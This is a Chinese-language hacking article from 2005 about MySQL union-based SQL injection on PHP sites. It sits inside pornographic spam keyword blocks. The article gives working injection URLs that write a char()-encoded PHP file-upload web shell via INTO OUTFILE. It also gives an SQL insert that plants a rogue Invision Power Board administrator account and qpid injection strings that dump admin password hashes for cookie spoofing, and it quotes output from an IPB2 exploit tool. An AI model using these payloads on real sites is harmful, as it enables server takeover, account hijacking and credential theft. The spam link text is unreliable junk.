国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

PHP+MySQL注入導出文件的新發現-附帶IPB2的漏洞利用
2005-12-17   

我前段時間寫了一篇《MySQL注入中導出字段內容的研究——通過注入導出WebShell》(http://www.4ngel.net/article/37.htm),是查詢數據然后在生成文件的,現在我發現其實不少PHP程序,比如IPB就是把數據處理過了,再插入數據庫,一般是htmlspecialchars()之后,插入數據,所以利用該文的方法,就行不通了,即使把webshell的代碼插入數據庫,生成出來的也是被處理過的代碼。用不了。

近段時間在測試一個PHP網站的時候,由于在load_file的時候,看不到文件的內容,所以我就懷疑是不是字段的原因,因為那些全部是int類型的,還有少數是VARCHAR的,我當初以為是因為這個原因,其實后來進入以后才發現是沒有FILE的權限,我不斷的換URL提交(注意,寫文章的時候,該網站已經修補了漏洞,現在是本地演示):

http://localhost/111/show.php?id=1 and 1=2 union select 1,1, char(47, 104, 111, 109, 101, 47, 119, 119, 119, 47, 99, 111, 110, 102, 105, 103, 46, 112, 104,112)

屏幕上顯示了:

/home/www/config.php

路徑沒錯啊,文件也存在啊,難道沒有權限?暫時放下這個,這個站點有可寫的目錄,是ipb2的論壇,/ipb2/uploads這個目錄是要設置成可寫的,上傳附件才能正常使用,我就想利用插數據,導出文件的方法,因為我看了phpinfo(),magic_quotes_gpc 是關閉的,所以用into outfile沒有問題,然后在本地測試了一下,發現提交的代碼:

變成了:

多提交幾個地方,均被做了處理,看來這樣我的這個思路又不行了,突然想到剛才看路徑的時候,能用char()函數輸出字符串,那我能不能直接寫上傳代碼?

這個轉換為10進制是這樣的:

char(60, 63, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 116, 109, 112, 95, 110, 97, 109, 101, 93, 44, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 110, 97, 109, 101, 93, 41, 59, 63, 62)

我馬上提交:

http://localhost/111/show.php?id=1 and 1=2 union select 1,1, char(60, 63, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 116, 109, 112, 95, 110, 97, 109, 101, 93, 44, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 110, 97, 109, 101, 93, 41, 59, 63, 62)

屏幕并沒有顯示出我們想要的東西,我查看源代碼,發現

這個代碼老老實實躺在里面,如圖:


 


之所以看不見,是因為瀏覽器把“<”和“>”之間的東西當成HTML代碼解析了,這么說是可行的!這樣的好處和插數據,導出文件相比好處在于:

因為之前,我猜到一個user表,我也不用去知道字段了,有字段作為查詢條件只是為了防止數據庫很大,導出所有數據時很慢的情況,我現在馬上就提交:

http://localhost/111/show.php?id=1 and 1=2 union select 1,1, char(60, 63, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 116, 109, 112, 95, 110, 97, 109, 101, 93, 44, 36, 95, 70, 73, 76, 69, 83, 91, 77, 121, 70, 105, 108, 101, 93, 91, 110, 97, 109, 101, 93, 41, 59, 63, 62) from user into outfile '/home/www/ipb2/uploads/upload.php'/*

馬上查看,如圖:



注意:因為我這里說是用char()這個函數寫的。所以就用這個來說明了。既然能用單引號就沒必要用CHAR函數了寫東西了??梢灾苯舆@樣:

http://localhost/111/show.php?id=1 and 1=2 union select 1,1, '<%3Fcopy(%24_FILES[MyFile][tmp_name],%24_FILES[MyFile][name]);%3F>' from user into outfile '/home/www/ipb2/uploads/upload.php'/*

其中:?=%3F、$=%24,注意編碼,暈……我怎么覺得這篇文章有點多余?。浚慷紝懙竭@里了,繼續吧!我只是為了告訴大家可以不用插數據了。5555,就這個意思而已也寫了這么多,我發現我這么久沒寫文章,邏輯性變差了,沒有條理了。各位將就點吧。

做個表單在本地提交:


< input NAME="MyFile" TYPE="file">
< input VALUE="提交" TYPE="submit">
< /form>

傳了一個phpspy上去,呵呵,phpmyadmin的密碼知道了,馬上查看了表前綴等相關信息,執行SQL語句:

INSERT INTO `ibf_members` VALUES ('999999', 'angel', 4, '', '4ngel@21cn.com', 1102196142, '0', 0, 'Administrator', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1102228365, 1102324215, 0, '0', 0, 0, '0', '0', 0, '0', 0, 0, 0, '2a841e6789e0bcee72d86cd911b9405d', 0);

這樣就添加了一個IPB2論壇的管理員用戶名是“angel”,密碼是“thepass”,呵呵。

到這里還沒有說IPB2的漏洞呢,現在補充一下怎么利用,因為這個測試的站點就是用最新的IPB2.0.2,所以順便把我測試的結果寫下來。真是不好意思。我通過IPB2的注入又進入了一次。

看了看IPB2安全公告:

http:/nothing/bbs/index.php?act=Post&CODE=02&f=2&t=1&qpid=[sql_injection]

得知qpid這個變量是沒有過濾的,我先提交:

http:/nothing/bbs/index.php?act=Post&CODE=02&f=2&t=1&qpid=1’

返回:

mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id)
WHERE pid IN (1')

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
mySQL error code:
Date: Monday 06th of December 2004 09:14:34 PM

看到了嗎?執行了什么SQL語句,都反饋回來了。從這里可以看出’(單引號)已經被過濾了,轉為10進制,變成'了,所以用into outfile沒有辦法導出文件。這里如果構造出有效的語句,也只能得到敏感信息了。

mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id)
WHERE pid IN (1')

從這里看到SQL語句后。我再試著構造語句,利用union聯合查詢,可以得到任意數據庫、任意數據表、任意字段的內容。提交:

http://localhost/ipb2/index.php?act=Post&CODE=02&f=2&t=1&qpid=1)%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,name,12,13,14,15,16,17,18,19,1%20from%20ibf_members%20where%20id=1%20/*

可以看到用戶id為1的用戶名。

http://localhost/ipb2/index.php?act=Post&CODE=02&f=2&t=1&qpid=1)%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1%20from%20ibf_members%20where%20id=1%20/*

可以看到用戶id為1的密碼MD5散列。

如果論壇太大了。找不到管理員的ID,直接用“where mgroup=4”作為查詢條件可以了。我也不多說怎么構造了。大家如果不明白構造,可以先去http//www.4ngel.net看看相關文章。有了這些敏感的數據,就可以直接COOKIE欺騙了哦。IPB2.0.0-2.0.2的COOKIE欺騙的漏洞細節,可以在綠盟看到(http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7181)。

RusH security team發布的IPB2的exploit(http://www.rst.void.ru/download/r57ipb.txt),要求的參數比較多,居然還要知道SID,如下:

## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>] ID:

如果成功利用了,就會返回,

## [ REPORT ]------------------------------------------------------------
## MEMBER_ID: [1] NAME: [angel] PASS_HASH: [2a841e6789e0bcee72d86cd911b9405d]
## -----------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

而且他們是CONCAT(id,char(58),name,char(58),member_login_key)這樣來判斷。自然沒有我們直接返回這么瀟灑了。不過工具也只能這樣了,手工的話,我們只用知道構造就行了,僅此而已。

工具只是武器,技術才是靈魂。毛主席說過:自己動手,豐衣足食。


熱詞搜索:

上一篇:從后臺到webshell的一點思路
下一篇:對形象中國全站系統的搜索注入漏洞的一點分析

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
91欧美激情一区二区三区成人| 99久久综合狠狠综合久久| 成人午夜av影视| 日本一二三四高清不卡| 国产91丝袜在线观看| 中文字幕制服丝袜成人av| 92精品国产成人观看免费| 亚洲卡通欧美制服中文| 3d动漫精品啪啪一区二区竹菊| 麻豆一区二区三区| 日韩毛片精品高清免费| 欧美片网站yy| 丁香婷婷综合色啪| 五月天国产精品| 国产精品日产欧美久久久久| 欧美专区亚洲专区| 国产最新精品免费| 亚洲一区视频在线观看视频| 久久久久久麻豆| 欧美中文字幕一区二区三区 | 精品日韩99亚洲| 成人手机电影网| 日韩av一级片| 一区二区三区在线观看网站| 日韩三级视频在线观看| 色综合中文字幕国产 | 精品视频在线免费| 成人亚洲一区二区一| 香蕉影视欧美成人| 亚洲视频一二三区| 久久精品视频在线免费观看| 欧美高清激情brazzers| 色哟哟在线观看一区二区三区| 国产在线精品一区二区夜色 | 欧美偷拍一区二区| 99国产精品一区| 成人免费毛片嘿嘿连载视频| 六月丁香综合在线视频| 无码av免费一区二区三区试看| 中文字幕在线观看一区二区| 日本一区免费视频| 久久精品一区二区三区四区| 精品入口麻豆88视频| 欧美色国产精品| 91传媒视频在线播放| 91免费视频大全| 91美女视频网站| 91老司机福利 在线| 色综合久久久久综合体桃花网| 成人高清在线视频| 成人精品免费看| 不卡电影一区二区三区| 99在线精品一区二区三区| 成人免费视频一区| 91免费观看视频| 色网站国产精品| 在线精品视频一区二区三四| 欧洲精品中文字幕| 欧美日韩小视频| 日韩欧美一区二区视频| 日韩天堂在线观看| 久久嫩草精品久久久精品一| 欧美极品xxx| 国产精品福利一区二区三区| ㊣最新国产の精品bt伙计久久| 亚洲人快播电影网| 亚洲福利视频一区二区| 日本欧美韩国一区三区| 国产精品一区二区久激情瑜伽 | 欧美激情一二三区| 综合色天天鬼久久鬼色| 日本va欧美va瓶| 亚洲bt欧美bt精品| 麻豆成人久久精品二区三区小说| 精品一二三四在线| 不卡欧美aaaaa| 欧美挠脚心视频网站| 日韩欧美成人一区| 国产日韩三级在线| 亚洲一区二区三区在线看| 日韩精品一级二级| 高清不卡一二三区| 欧美日韩一区高清| 久久精子c满五个校花| 夜夜爽夜夜爽精品视频| 激情综合网最新| 色伊人久久综合中文字幕| 欧美v日韩v国产v| 亚洲男人的天堂av| 久久精品国产77777蜜臀| 91麻豆国产精品久久| 日韩欧美成人一区二区| 亚洲精品视频在线看| 国产主播一区二区三区| 欧美日本一区二区三区四区| 国产精品美女久久久久久久久久久| 一区二区成人在线视频| 国产美女娇喘av呻吟久久| 色婷婷国产精品| 久久久精品黄色| 奇米影视7777精品一区二区| aaa国产一区| 2023国产精品视频| 偷拍亚洲欧洲综合| 色8久久精品久久久久久蜜| 国产婷婷一区二区| 九一久久久久久| 欧美精品丝袜中出| 香蕉久久夜色精品国产使用方法| 波多野结衣一区二区三区 | 中文字幕在线免费不卡| 黄色日韩三级电影| 在线电影国产精品| 亚洲一区二区五区| 色爱区综合激月婷婷| 国产精品嫩草久久久久| 国产毛片精品视频| 精品动漫一区二区三区在线观看| 亚洲国产va精品久久久不卡综合| 91小视频免费观看| 国产精品三级电影| 成人黄色在线视频| 中文一区在线播放| 成人一区在线观看| 国产精品丝袜一区| 99久久综合国产精品| 亚洲欧洲性图库| 一本色道久久综合亚洲91| 亚洲精品免费在线观看| 91美女精品福利| 亚洲国产你懂的| 欧美群妇大交群的观看方式| 香蕉加勒比综合久久| 91精品国产手机| 久久成人综合网| 久久精品视频一区二区| 成人福利在线看| 一区二区三区免费网站| 欧美日韩综合在线免费观看| 五月婷婷激情综合网| 欧美一区二区三区思思人| 蜜臂av日日欢夜夜爽一区| 久久久精品综合| 不卡的电视剧免费网站有什么| 日韩美女久久久| 在线观看日韩高清av| 亚洲www啪成人一区二区麻豆| 91精品国产综合久久香蕉麻豆 | 美女视频黄久久| 国产夜色精品一区二区av| av一区二区三区黑人| 亚洲一级不卡视频| 欧美成人激情免费网| 国产成人一区在线| 亚洲一区欧美一区| 精品成人佐山爱一区二区| 成人av一区二区三区| 婷婷久久综合九色综合绿巨人| 日韩欧美中文一区二区| 成人性生交大片免费| 亚洲第一福利一区| 国产亲近乱来精品视频| 欧美裸体bbwbbwbbw| 成人综合日日夜夜| 美女视频黄免费的久久| 中文字幕中文乱码欧美一区二区 | 国产成人精品影视| 亚洲成av人片www| 亚洲国产精品传媒在线观看| 欧美日韩综合一区| 成人久久久精品乱码一区二区三区| 亚洲一区二区四区蜜桃| 国产无一区二区| 日韩精品在线一区| 91国模大尺度私拍在线视频| 国产在线不卡一卡二卡三卡四卡| 亚洲午夜私人影院| 中文字幕中文字幕一区二区| 精品美女一区二区| 在线播放/欧美激情| 99久久精品99国产精品| 国产乱子轮精品视频| 蜜桃视频第一区免费观看| 亚洲国产精品麻豆| 国产精品久久午夜夜伦鲁鲁| 精品免费日韩av| 日韩一区二区三区在线视频| 欧美午夜影院一区| 色婷婷激情综合| 91亚洲永久精品| kk眼镜猥琐国模调教系列一区二区| 日本不卡不码高清免费观看| 亚洲动漫第一页| 亚洲一区二区三区影院| 亚洲日本丝袜连裤袜办公室| 国产精品伦一区| 欧美国产综合一区二区| 国产日产欧美一区| 国产精品色婷婷久久58| 中文字幕免费一区|